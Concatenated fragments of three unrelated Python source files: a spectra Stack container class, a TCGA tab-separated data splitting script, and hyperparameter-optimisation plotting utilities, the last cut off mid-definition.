def __getitem__(self, keyslice):
""" If single name, used dict interface. If slice or integer, uses
list interface. All results parameterized to key, data pairs, passed
directly into a new Stack.
"""
# Slice as list of strings or int [0, 'foo', 2, 'bar']
if hasattr(keyslice, '__iter__'):
tuples_out = []
for item in keyslice:
if isinstance(item, str):
item = self._data.keys().index(item)
tuples_out.append(self._data.items()[item])
else:
if isinstance(keyslice, int) or isinstance(keyslice, slice):
tuples_out = self._data.items()[keyslice]
else:
tuples_out = [(keyslice, self._data[keyslice])] #keyslice is name
# If single item, return TimeSpectra, else, return new Stack
# Canonical slicing implementaiton; don't change unless good reason
# Because len() wonky with nested tuples (eg (x,y) and [(x1,y1),(x2,y2)]
# are both length two, this will work:
if sum(1 for x in tuples_out) == 2:
return tuples_out[1] #Return timespectra
else:
return self.__class__(tuples_out)
def __delitem__(self, keyslice):
""" Delete a single name, or a keyslice from names/canvas """
if isinstance(keyslice, str):
idx = self.names.index(keyslice)
self.pop(idx)
else:
raise NotImplementedError("Deletion only supports single entry")
def __setitem__(self, name, canvas):
""" """
if name in self.names:
idx = self.names.index(name)
self.pop(idx)
self.insert(idx, name, canvas)
else:
self.names.append(name)
def __getattr__(self, attr):
""" If attribute not found, try attribute lookup in dictionary. If
that is not found, try finding attribute on self._data.
For example, self.keys() will first look for self['keys']. Since
this isn't found, it calls self._data.keys(). But if I do
self.Item1, then it returns self['Item1']. The very rare conflict
case that a user has named the items a method that may already exist
in the dictionary (eg items=['a','b','keys'] is addressed.
"""
if attr in self._data.keys():
if hasattr(self._data, attr):
raise AttributeError('"%s attribute" found in both the items\
and as a method of the underlying dictionary object.'%(attr))
else:
return self[attr]
return getattr(self._data, attr)
# Attributes deferred to self.data /dictionary
def __len__(self):
return self._data.__len__()
def __iter__(self):
return self._data.__iter__()
def __reversed__(self):
return self._data.__reversed__()
def __contains__(self):
return self._data.__contains__()
def as_3d(self):
""" Return 3d structure of data. Default is panel."""
raise Panel(data=self._data)
### Data types without labels
#Is this realy necessary? See pyparty.ParticleManger for possibly more consistent implementation
def get_all(self, attr, astype=tuple):
"""Generator/tuple etc.. of (item, attribute) pairs. """
return put._parse_generator(
((item[0], getattr(item[1], attr)) for item in self.items()), astype)
def _get_unique(self, attr):
""" Inspects Stack itemwise for an attribute for unique values.
If non-unique value for the attributes are found, returns
"mixed".
"""
unique = set(self.get_all(attr, astype=dict).values())
if len(unique) > 1:
return 'mixed'
else:
return tuple(unique)[0] #set doesn't support indexing
def set_all(self, attr, val, inplace=False):
""" Set attributes itemwise.
If not inplace, returns new instance of self"""
if inplace:
for (key, item) in self.items():
try:
setattr(item, attr, val)
except Exception as E:
raise Exception('Could not set %s in "%s". Received the following \
exception:\n "%s"'%(attr, key, E))
else:
out=deepcopy(self._data) #DEEPCOPY
for item in out:
setattr(out[item], attr, val)
return self.__class__(out)
def apply(self, func, *args, **kwargs):
""" Applies a user-passed function, or calls an instance method itemwise.
Parameters:
-----------
func: str or function
If string, must correspond to a method on the object stored
itemwise in the stack. If a function, appliked itemwise to
objects stored.
inplace: False
Special kwarg. If true, self._data modified inplace,
otherwise new specstack is returned.
*args, **kwargs:
func arguments.
Returns:
--------
If not inplace, returns SpecStack after itemwise application.
"""
inplace=kwargs.pop('inplace', False)
if isinstance(func, basestring):
if inplace:
for item in self:
self[item] = getattr(self[item], func)(*args, **kwargs)
else:
return self.__class__(OrderedDict([(k, getattr(v, func)(*args, \
**kwargs)) for k,v in self.items()]))
# function, numpyfunction etc...
else:
if inplace:
for item in self:
self[item] = self[item].apply(func)(*args, **kwargs)
else:
return self.__class__(OrderedDict([(k, v.apply(func, *args, \
**kwargs)) for k,v in self.items()]))
@property
def full_name(self):
""" Timespectra:name or Timespectra:unnamed. Useful for scripts mostly """
outname = getattr(self, 'name', 'unnamed')
return '%s:%s' % (self.__class__.__name__, self.name)
#def __repr__(self):
#""" """
@logclass(log_name=__name__)
class SpecStack(Stack):
""" Stack for just storing timespectra objects."""
itemlabel='spec_'
def as_3d(self, **kwargs):
""" Returns a 3d stack (SpecPanel) of the currently stored items.
Additional kwargs can be passed directly to SpecPanel constructor."""
from specpanel import SpecPanel
return SpecPanel(data=self._data, **kwargs)
### Special properties for swift, in-place attribute overwrites of most
### common itemwise operation. Getter only tests for uniqueness
@property
def specunit(self):
return self._get_unique('specunit')
### Do I want to make as a _set method to avoid accidental overwrite?
@specunit.setter
def specunit(self, unit):
""" Sets specunit for every stored TimeSpectra."""
self.set_all('specunit', unit, inplace=True)
@property
def iunit(self):
return self._get_unique('iunit')
@iunit.setter
def iunit(self, unit):
""" Sets iunit for every stored TimeSpectra."""
self.set_all('iunit', unit, inplace=True)
@property
def reference(self):
return self._get_unique('reference')
@reference.setter
def reference(self, ref):
""" Set reference itemwise. No getter, use get_all() instead."""
self.set_all('reference', ref, inplace=True)
### This shouldn't have a setter
@property
def varunit(self):
return self._get_unique('varunit')
def plot(self, *plotargs, **plotkwargs):
"""Returns multiplot of current stack.
Notes
-----
Wraps skspec.plotting.multiplots.slice_plot()
"""
plotkwargs.setdefault('title', self.name)
if 'cbar' in plotkwargs:
raise NotImplementedError("Colorbar on stack plot not yet supported")
return slice_plot(self.values(), *plotargs, names=self.keys(), **plotkwargs)
#def __repr__(self):
#outstring = "%s (%s) %s: " % \
#(self.__class__.__name__, self._address, 'what goes here')
#Ln = len(self)
#if Ln == 0:
#outstring += 'EMPTY'
#elif Ln >= MAXOUT:
#outstring += '%s canvii (%s ... %s)' % \
#(Ln, self.names[0], self.names[-1])
#else:
#SEP_CHARACTER = | |
<reponame>cancerregulome/gidget
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
import miscTCGA
import tsvIO
import random
import sys
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
NA_VALUE = -999999
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
# the input is a data dictionary which should have 4 keys:
# 'dataType' single string, eg 'GEXP'
# 'rowLabels' vector of feature labels
# 'colLabels' vector of column (sample) labels
# 'dataMatrix' matrix of values
# the output is a data dictionary with the same # of rows, but some columns
# may have been removed if they do not represent tumor samples ... also the
# TCGA barcodes are stripped down to the point where they uniquely identify
# tumor samples
#
# FIXME: this should be modified to take a list of rows or columns to remove
# and then return a new dataD ... (put that into tsvIO???)
def removeNonTumorSamples(dataD):
## miscTCGA.lookAtBarcodes ( dataD['colLabels'] )
numCol = len(dataD['colLabels'])
keepCols = [0] * numCol
tumorList = []
numOutCol = 0
for jj in range(numCol):
aCode = dataD['colLabels'][jj]
tumorCode = ''
# if the barcode is not even long enough to specify the sample type,
# we will just assume that we keep it ...
if (len(aCode) < 16):
tumorCode = aCode
else:
# if the barcode is at least 16 characters long, then we parse it
# ...
aCode = miscTCGA.fixTCGAbarcode(aCode)
(site, patient, sample, vial, portion, analyte,
plate, center) = miscTCGA.parseTCGAbarcode(aCode)
try:
iSample = int(sample)
except:
iSample = -1
if (sample != aCode):
print " what is going on here ??? ", aCode
sys.exit(-1)
if (iSample > 0 and iSample < 10):
tumorCode = miscTCGA.sampleLevelCode(aCode)
if (tumorCode != ''):
if (tumorCode not in tumorList):
tumorList += [tumorCode]
keepCols[jj] = 1
numOutCol += 1
else:
print " WARNING: in removeNonTumorSamples ... multiple columns for the same tumor sample ??? "
print aCode, tumorCode
# print tumorList
print " --> keeping only the first one "
# sys.exit(-1)
rmColList = []
for jj in range(numCol):
if (keepCols[jj] == 0):
rmColList += [jj]
print " will remove sample <%s> " % dataD['colLabels'][jj]
# filter out the columns we don't want ...
dataD = tsvIO.filter_dataMatrix(dataD, [], rmColList)
print " back from filter_dataMatrix ... ", dataD['colLabels'][:5]
# NOTE: this next bit may no longer be necessary ...
# and also set the shortened TCGA barcodes as labels ...
if (len(tumorList) != len(dataD['dataMatrix'][0])):
print " ERROR !!! length of tumorList does not correspond to size of dataMatrix !!! "
print len(tumorList)
tsvIO.lookAtDataD(dataD)
sys.exit(-1)
dataD['colLabels'] = tumorList
print " now using shortened barcodes .. ", dataD['colLabels'][:5]
return (dataD)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def dropSampleTypeFromBarcodes(dataD):
## miscTCGA.lookAtBarcodes ( dataD['colLabels'] )
numCol = len(dataD['colLabels'])
codeList = []
for jj in range(numCol):
aCode = dataD['colLabels'][jj]
if (aCode > 12):
aCode = aCode[:12]
dataD['colLabels'][jj] = aCode
if (aCode not in codeList):
codeList += [aCode]
else:
print " WARNING in dropSampleTypeFromBarcodes ... duplicates ??? ", aCode
# print codeList
# sys.exit(-1)
return (dataD)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def intersectLists(aList, bList):
cList = []
for aToken in aList:
if (aToken in bList):
cList += [aToken]
return (cList)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def unionLists(aList, bList):
for bToken in bList:
if (bToken not in aList):
aList += [bToken]
return (aList)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def getMappingVector(unionLabels, curLabels):
mapVec = [-1] * len(curLabels)
for ii in range(len(curLabels)):
aLabel = curLabels[ii]
if (aLabel.startswith("TCGA-")):
aLabel = miscTCGA.sampleLevelCode(aLabel)
try:
jj = unionLabels.index(aLabel)
mapVec[ii] = jj
except:
print " ERROR ... did not find <%s> in union labels ... " % aLabel
print unionLabels
sys.exit(-1)
print " mapping vector from %d into %d ... " % (len(curLabels), len(unionLabels))
print " ", mapVec[:20]
# print curLabels[:20]
# print unionLabels[:20]
print " "
return (mapVec)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def makeDataTypeString(dTypeList, fTypeList):
# print " in makeDataTypeString ... "
# print dTypeList
# print fTypeList
if ("MISC" in fTypeList):
dTypeString = "M:MISC"
return (dTypeString)
if (len(dTypeList) == 1):
dTypeString = dTypeList[0]
else:
dTypeString = "M"
dTypeString += ":"
for aType in fTypeList:
if (dTypeString[-1] != ":"):
dTypeString += "+"
dTypeString += aType
print " output data type string : <%s> " % dTypeString
return (dTypeString)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def readSampleListFromFile(sampleFile):
fh = file(sampleFile)
sampleList = []
for aLine in fh:
aLine = aLine.strip()
sampleList += [aLine]
fh.close()
return (sampleList)
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
def createOutputFileName ( inFile, rowLabel, aCat ):
## we want to decide whether or not to include part of the feature
## name in to the output file name ... if the category label is
## sufficiently generic that it might not be very unique/informative
nameFlag = 0
uCat = str(aCat).upper()
if ( uCat in [ "0", "1", "NO", "YES", "FALSE", "TRUE", "MUT", "WT", "ALIVE", "DEAD", "MALE", "FEMALE" ] ):
nameFlag = 1
if ( len(uCat) == 2 ):
if ( uCat[0] in [ "T", "N", "M", "C" ] ):
try:
iCat = int(uCat[1])
nameFlag = 1
except:
doNothing = 1
if ( uCat.find("PRIMARY") > 0 ): nameFlag = 1
if ( uCat.find("METASTA") > 0 ): nameFlag = 1
if ( nameFlag == 0 ):
nameStr = ''
else:
tokenList = rowLabel.split(':')
if ( tokenList[2].startswith("I(") ):
subName = tokenList[2][2:-1]
i1 = subName.find("|")
if ( i1 > 0 ): subName = subName[:i1]
i1 = subName.find(",")
if ( i1 > 0 ): subName = subName[:i1] + "_vs_" + subName[i1+1:]
else:
subName = tokenList[2]
nameStr = subName + "_"
try:
if ( len(tokenList[7]) > 0 ):
nameStr += tokenList[7] + "_"
except:
doNothing = 1
nameStr += "_"
if (inFile.endswith(".tsv")):
outFile = inFile[:-4] + "." + nameStr + str(aCat) + ".tsv"
else:
outFile = inFile + "." + nameStr + str(aCat) + ".tsv"
return ( outFile )
# -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#
if __name__ == "__main__":
if (1):
# there must be exactly 3 arguments ...
if (len(sys.argv) != 3):
print " Usage : %s <input file> <categorical feature> " % sys.argv[0]
print " ERROR -- bad command line arguments "
sys.exit(-1)
inFile = sys.argv[1]
catFeature = sys.argv[2]
print " "
print " ***************************************************************** "
print " calling readTSV ... ", inFile
dataD = tsvIO.readTSV(inFile)
if (dataD == {}):
print " --> file does not exist or is empty "
sys.exit(-1)
tsvIO.lookAtDataD(dataD)
# make sure that we can find the specified feature ...
try:
rowLabels = dataD['rowLabels']
colLabels = dataD['colLabels']
except:
print " ERROR in splitTSVbyCat ??? "
sys.exit(-1)
numRow = len(rowLabels)
numCol = len(colLabels)
if (catFeature != "random"):
foundList = []
for iR in range(numRow):
if (rowLabels[iR].find(catFeature) >= 0):
foundList += [iR]
if (len(foundList) == 0):
print " ERROR ??? could not find specified feature ??? ", catFeature
sys.exit(-1)
elif (len(foundList) > 1):
if (1):
print " found several matches ... choosing shortest one "
strLen = 999999
for iR in foundList:
if (len(rowLabels[iR]) < strLen):
strLen = len(rowLabels[iR])
jR = iR
print " --> %s " % rowLabels[jR]
foundList = [jR]
else:
print " ERROR ??? found too many matches ??? ", catFeature
for iR in foundList:
print rowLabels[iR]
sys.exit(-1)
iR = foundList[0]
if (rowLabels[iR].startswith("N:")):
print " ERROR ??? splitting should be done on a categorical (or binary) feature ! "
sys.exit(-1)
catVec = [0] * numCol
catUnq = []
for iC in range(numCol):
catVec[iC] = dataD['dataMatrix'][iR][iC]
if (catVec[iC] not in catUnq):
catUnq += [catVec[iC]]
catUnq.sort()
print catUnq
else:
# for random splitting, use two arbitrary labels
catUnq = ["r0", "r1"]
catVec = [0] * numCol
num0 = 0
num1 = 0
for iC in range(numCol):
iRand = random.randint(0, 1)
catVec[iC] = catUnq[iRand]
if (iRand == 0):
num0 += 1
if (iRand == 1):
num1 += 1
print " --> generated random labels ... %d %d " % (num0, num1)
# now we need to filter the matrix for each of the categories ...
for aCat in catUnq:
if (aCat == "NA"):
continue
print " "
print " "
print " handling ", aCat
rmColList = []
for iC in range(numCol):
if (catVec[iC] != aCat):
rmColList += [iC]
numRm = len(rmColList)
numKp = numCol - numRm
if (numKp < 10):
print " --> too few columns remaining ... skipping this category ... (%d) " % numKp
else:
outD = tsvIO.filter_dataMatrix(dataD, [], rmColList)
# make sure that we are not left with any features that are all-NA | |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Hyperopt plotting utilities.
"""
import os
import csv
import ipdb
import json
import pandas as pd
import pickle as pkl
from collections import defaultdict
import numpy as np
import scipy.ndimage
from matplotlib import ticker
import matplotlib.pyplot as plt
import matplotlib.ticker as tick
import matplotlib.colors as colors
from matplotlib.ticker import MultipleLocator
import seaborn as sns
sns.set_style('white')
sns.set_palette('bright')
def reformat_large_tick_values(tick_val, pos):
"""
Turns large tick values (in the billions, millions and thousands) such as 4500 into 4.5K and also appropriately turns 4000 into 4K (no zero after the decimal).
"""
if tick_val >= 1000000000:
val = round(tick_val/1000000000, 1)
new_tick_format = '{:}B'.format(val)
elif tick_val >= 1000000:
val = round(tick_val/1000000, 1)
new_tick_format = '{:}M'.format(val)
elif tick_val >= 1000:
val = round(tick_val/1000, 1)
new_tick_format = '{:}K'.format(val)
elif tick_val < 1000:
new_tick_format = round(tick_val, 1)
else:
new_tick_format = tick_val
# make new_tick_format into a string value
new_tick_format = str(new_tick_format)
# code below will keep 4.5M as is but change values such as 4.0M to 4M since that zero after the decimal isn't needed
index_of_decimal = new_tick_format.find(".")
if index_of_decimal != -1:
value_after_decimal = new_tick_format[index_of_decimal+1]
if value_after_decimal == "0":
# remove the 0 after the decimal point since it's not needed
new_tick_format = new_tick_format[0:index_of_decimal] + new_tick_format[index_of_decimal+2:]
return new_tick_format
def load_log(exp_dir, fname='train_log.csv'):
result_dict = defaultdict(list)
with open(os.path.join(exp_dir, fname), newline='') as csvfile:
reader = csv.DictReader(csvfile)
for row in reader:
for key in row:
try:
if key in ['global_iteration', 'iteration', 'epoch']:
result_dict[key].append(int(row[key]))
else:
result_dict[key].append(float(row[key]))
except:
pass
return result_dict
def print_best_thetas(log,
key='train_loss',
print_keys=['train_sum_loss', 'train_loss', 'val_loss', 'train_acc', 'val_acc'],
top_k=1,
reverse=False,
constrained=True):
sorted_idxs = np.argsort(log[key])
if reverse:
sorted_idxs = list(reversed(sorted_idxs))
if constrained:
theta_key = 'thetas_constrained'
else:
theta_key = 'thetas'
for k, idx in enumerate(sorted_idxs[:top_k]):
print('{} Top {}: {}'.format(key, k, log[key][idx]))
for print_key in print_keys:
print('{}: {:5.3f}'.format(print_key, log[print_key][idx]))
print(' ')
print('\n')
def print_best_thetas_for_keys(log,
keys=['train_sum_loss', 'train_loss', 'val_loss', 'train_acc', 'val_acc'],
top_k=1,
constrained=True):
for key in keys:
print_best_thetas(log, key=key, print_keys=keys,
top_k=top_k, reverse=True if 'acc' in key else False, constrained=constrained)
def plot_hist(directory, key, ax=None, bins=60, min_value=None, max_value=None, yscale='linear'):
rs_values = get_all_random_search_values(directory, key=key)
if not max_value:
max_value = np.nanmax(rs_values)
if not min_value:
min_value = np.nanmin(rs_values)
if ax:
plt.sca(ax)
else:
plt.figure()
plt.hist([value for value in np.sort(rs_values) if (value >= min_value) and (value <= max_value)], bins=bins)
plt.xticks(fontsize=18)
plt.yticks(fontsize=18)
plt.yscale(yscale)
plt.xlabel('Objective Value', fontsize=20)
plt.ylabel('Count', fontsize=20)
plt.title(key, fontsize=20)
def get_best_theta(log, key='train_losses', top_k=1, reverse=False, constrained=True):
sorted_idxs = np.argsort(log[key])
if reverse:
sorted_idxs = list(reversed(sorted_idxs))
if constrained:
theta_key = 'thetas_constrained'
else:
theta_key = 'thetas'
# for idx in sorted_idxs[:top_k]:
# for name, value in zip(log['hparam_fieldnames'], log[theta_key][idx]):
# print('\t{}: {:6.3e}'.format(name, value))
best_theta = log[theta_key][sorted_idxs[0]]
value_at_best_theta = log[key][sorted_idxs[0]]
# print('Best theta: {} | Value at theta: {}'.format(best_theta, value_at_best_theta))
return best_theta, value_at_best_theta, sorted_idxs
def make_dataframe(result):
subset_result = {}
subset_result['thetas'] = [', '.join(['{:5.2f}'.format(item) for item in theta]) for theta in result['thetas']]
subset_result['train_accs'] = result['train_accs']
subset_result['val_accs'] = result['val_accs']
subset_result['train_losses'] = result['train_losses']
subset_result['val_losses'] = result['val_losses']
subset_result['trajectory_sums'] = result['trajectory_sums']
# subset_result['train_cost'] = result['train_cost']
df = pd.DataFrame.from_dict(subset_result, orient='index').transpose()
return df
def make_theta_dicts(result):
best_theta_F_sum, value_at_best_theta_F_sum = get_best_theta(result, key='trajectory_sums', reverse=False)
best_theta_train_loss, value_at_best_theta_train_loss = get_best_theta(result, key='train_losses', reverse=False)
best_theta_val_loss, value_at_best_theta_val_loss = get_best_theta(result, key='val_losses', reverse=False)
best_theta_train_acc, value_at_best_theta_train_acc = get_best_theta(result, key='train_accs', reverse=True)
best_theta_val_acc, value_at_best_theta_val_acc = get_best_theta(result, key='val_accs', reverse=True)
best_theta_dict = {'F_sum': best_theta_F_sum,
'full_train_loss': best_theta_train_loss,
'full_val_loss': best_theta_val_loss,
'full_train_acc': best_theta_train_acc,
'full_val_acc': best_theta_val_acc,
}
value_at_best_theta_dict = {'F_sum': value_at_best_theta_F_sum,
'full_train_loss': value_at_best_theta_train_loss,
'full_val_loss': value_at_best_theta_val_loss,
'full_train_acc': value_at_best_theta_train_acc,
'full_val_acc': value_at_best_theta_val_acc,
}
return best_theta_dict, value_at_best_theta_dict
def plot_heatmap(pkl_path, xlabel, ylabel, title='', key='train_sum_loss', cmap=plt.cm.gray, levels=10, figsize=(10,8)):
with open(pkl_path, 'rb') as f:
result = pkl.load(f)
side_length = int(np.sqrt(len(result['thetas'])))
# grid_data = result[key]
grid_data = result[key].reshape(side_length, side_length)
vmin = np.nanmin(grid_data)
vmax = np.nanmax(grid_data)
xv, yv = result['xv'], result['yv']
if key in ['F_grid_train_loss', 'F_grid_val_loss'] and (vmax > 3):
vmax = 3
elif key == 'train_sum_loss':
vmax = 1e4
grid_data[np.isnan(grid_data)] = vmax
grid_data[grid_data > vmax] = vmax
smoothed_F_grid = scipy.ndimage.gaussian_filter(grid_data, sigma=1.0)
plt.figure(figsize=figsize)
if key in ['F_grid_train_loss', 'F_grid_val_loss', 'train_sum_loss']:
smoothed_F_grid = np.log(smoothed_F_grid)
if 'acc' in key:
# levels = [0, 0.5, 0.6, 0.7, 0.8, 0.85, 0.9, 0.95, 0.97, 0.98, 0.99]
levels = [0.9, 0.91, 0.92, 0.93, 0.94, 0.95, 0.96, 0.97, 0.98, 0.99, 1.0]
contour_cmap = plt.cm.get_cmap(cmap, len(levels)+1)
CS = plt.contourf(yv, xv, smoothed_F_grid.T, levels=levels, cmap=contour_cmap)
print(CS.levels)
cbar = plt.colorbar(CS, boundaries=levels)
cbar.ax.tick_params(labelsize=16)
else:
contour_cmap = plt.cm.get_cmap(cmap, levels+1)
CS = plt.contourf(yv, xv, smoothed_F_grid.T, levels=levels, cmap=contour_cmap)
cbar = plt.colorbar(CS)
cbar.ax.tick_params(labelsize=16)
plt.xticks(fontsize=18)
plt.yticks(fontsize=18)
plt.xlabel(xlabel, fontsize=20)
plt.ylabel(ylabel, fontsize=20)
plt.title(title, fontsize=24)
def plot_hparams(log,
keys,
inner_problem_len=200,
xkey='inner_problem_steps',
plot_inner_problem_ticks=False,
xlim=None,
xtick_locs=None,
xtick_labels=None,
xscale='linear',
yscale='linear',
xlabel='Inner Iteration',
ylabel='Hyperparameter Value',
show_legend=True,
legend_outside=True):
plt.figure(figsize=(8,5))
colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
for i, key in enumerate(keys):
# plt.plot(log['result_dict'][xkey], np.log10(np.exp(np.array(log['result_dict'][key]))),
# label='{}'.format(key), color=colors[i % len(colors)], marker='o', linewidth=2, linestyle='-')
plt.plot(log[xkey], np.log10(np.exp(np.array(log[key]))),
label='{}'.format(key), color=colors[i % len(colors)], linewidth=2, linestyle='-')
plt.xlabel(xlabel, fontsize=18)
plt.ylabel(ylabel, fontsize=18)
if xlim:
plt.xlim(xlim)
plt.xscale(xscale)
plt.yscale(yscale)
if plot_inner_problem_ticks:
ml = MultipleLocator(inner_problem_len)
plt.gca().xaxis.set_minor_locator(ml)
plt.gca().xaxis.set_major_locator(ml)
plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
if xtick_locs:
plt.xticks(xtick_locs, xtick_labels, fontsize=18)
else:
plt.xticks(fontsize=18)
plt.yticks(fontsize=18)
if show_legend:
if legend_outside:
plt.legend(fontsize=16, fancybox=True, framealpha=0.3, bbox_to_anchor=(1.04,1), loc='upper left')
else:
plt.legend(fontsize=16, fancybox=True, framealpha=0.3)
plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
sns.despine()
def plot_es_pes_hparams(es_log, pes_log, keys, inner_problem_len=200, xlim=None,
xtick_locs=None, xtick_labels=None, yscale='linear',
xlabel='Inner Iteration', ylabel='Hyperparameter Value',
legend_outside=False):
plt.figure(figsize=(8,5))
# plt.axhline(y=best_theta_dict['F_sum'], color='k')
colors = plt.rcParams['axes.prop_cycle'].by_key()['color']
for i, key in enumerate(keys):
plt.plot(es_log['inner_problem_steps'], es_log[key],
label='ES {}'.format(key), color=colors[i % len(colors)], linewidth=2, linestyle='-', alpha=0.4)
for i, key in enumerate(keys):
plt.plot(pes_log['inner_problem_steps'], pes_log[key],
label='PES {}'.format(key), color=colors[i % len(colors)], linewidth=2, alpha=1)
ml = MultipleLocator(inner_problem_len)
plt.gca().xaxis.set_minor_locator(ml)
plt.gca().xaxis.set_major_locator(ml)
plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
plt.xlabel(xlabel, fontsize=18)
plt.ylabel(ylabel, fontsize=18)
if xtick_locs:
plt.xticks(xtick_locs, xtick_labels, fontsize=18)
else:
plt.xticks(fontsize=18)
plt.yticks(fontsize=18)
if xlim:
plt.xlim(xlim)
plt.yscale(yscale)
if legend_outside:
plt.legend(fontsize=16, fancybox=True, framealpha=0.3, bbox_to_anchor=(1.04,1), loc='upper left')
else:
plt.legend(fontsize=16, fancybox=True, framealpha=0.3)
plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
sns.despine()
def plot_performance(log, show_key,
xkey='inner_problem_steps',
inner_problem_len=200,
plot_inner_problem_ticks=False,
xlim=None,
xtick_locs=None, xtick_labels=None,
xscale='linear', yscale='linear'):
plt.figure(figsize=(8,5))
plt.plot(log[xkey], log[show_key], linewidth=2, marker='o')
plt.xlabel('Inner Iteration', fontsize=20)
plt.ylabel(y_label_dict[show_key], fontsize=20)
if plot_inner_problem_ticks:
ml = MultipleLocator(inner_problem_len)
plt.gca().xaxis.set_minor_locator(ml)
plt.gca().xaxis.set_major_locator(ml)
plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
plt.xticks(xtick_locs, xtick_labels, fontsize=18)
plt.yticks(fontsize=18)
plt.xlim(xlim)
# plt.xscale(xscale)
plt.yscale(yscale)
plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
sns.despine()
def plot_es_pes_performance(es_log, pes_log, show_key, inner_problem_len=200, xlim=None,
xtick_locs=None, xtick_labels=None, yscale='linear'):
plt.figure(figsize=(10,5))
plt.figure(figsize=(8,5))
# Plot value at the best theta found by the random search
# plt.axhline(y=value_at_best_theta_dict[show_key], color='k', linestyle='-')
plt.plot(es_log['inner_problem_steps'], es_log[show_key], label='ES', linewidth=2)
plt.plot(pes_log['inner_problem_steps'], pes_log[show_key], label='PES', linewidth=2)
ml = MultipleLocator(inner_problem_len)
plt.gca().xaxis.set_minor_locator(ml)
plt.gca().xaxis.set_major_locator(ml)
plt.gca().xaxis.grid(which='both', color='k', linestyle='-.', linewidth=0.5, alpha=0.5)
plt.xlabel('Inner Iteration', fontsize=20)
plt.ylabel(y_label_dict[show_key], fontsize=20)
plt.xticks(xtick_locs, xtick_labels, fontsize=18)
plt.yticks(fontsize=18)
plt.xlim(xlim)
plt.yscale(yscale)
plt.legend(fontsize=16, fancybox=True, framealpha=0.3)
plt.gca().xaxis.set_major_formatter(tick.FuncFormatter(reformat_large_tick_values))
sns.despine()
def plot_piecewise_schedule_knots_vals(knots, values, T=2500, color=None, alpha=1.0, create_figure=True):
ts = jax.nn.softmax(jnp.array(knots))
ts = jnp.cumsum(ts)
ts = jnp.concatenate([jnp.array([0.0]), ts]) # Explicitly add the 0 mark --> [0, 0.25, 0.5, 0.75, 1]
ts = ts * T
if create_figure:
plt.figure()
if color:
plt.plot(ts, values, marker='o', linewidth=2, color=color, alpha=alpha)
else:
plt.plot(ts, values, marker='o', linewidth=2, alpha=alpha)
plt.xticks(fontsize=18)
plt.yticks(fontsize=18)
plt.xlabel('Iteration', fontsize=20)
plt.ylabel('Hparam Schedule', fontsize=20)
def plot_piecewise_schedule(log, T=2500):
# log = log['result_dict']
knots = [log[key][-1] for key in log.keys() if 'knot' in key and 'grad' not in key]
values = [log[key][-1] for key in log.keys() if 'value' in key and 'grad' not in key]
plot_piecewise_schedule_knots_vals(knots, values, T)
def plot_individual_layer_grid(log_dir, xkey='inner_problem_steps', key_identifier='lr'):
log = load_log(log_dir, fname='frequent.csv')
keys = [key for key in log.keys() if key_identifier in key and 'grad' not in key]
param_name_hparam_dict = defaultdict(list)
xvalues = log[xkey]
ymin = 10
ymax = -10
for key in keys:
if '/' in key:
values = log[key]
param_name, hparam_name = key.rsplit('/', 1)
param_name_hparam_dict[param_name].append((hparam_name, values))
if min(values) < ymin:
ymin = min(values)
if max(values) > ymax:
ymax = max(values)
nrows = 5
ncols = 5
fig, axs = plt.subplots(nrows=nrows, ncols=ncols, figsize=(14, 14))
i = 0
for param_name in param_name_hparam_dict:
ax_row, ax_col = i // nrows, i % ncols
for (hparam_name, values) in param_name_hparam_dict[param_name]:
axs[ax_row, ax_col].plot(xvalues, values, label=hparam_name)
axs[ax_row, ax_col].set_ylim(ymin, ymax)
axs[ax_row, ax_col].set_title(param_name[6:], fontsize=10)
axs[ax_row, ax_col].legend(fontsize=14, fancybox=True, framealpha=0.3)
i += 1
plt.tight_layout()
def plot_stuff(log_dir,
xkey='inner_problem_steps',
key_identifiers=['net'],
perf_keys=['F_sum', 'full_val_acc'],
what_to_show=['uncons_hparams', 'cons_hparams', 'performance', 'online'],
plot_grads=False,
inner_problem_len=200,
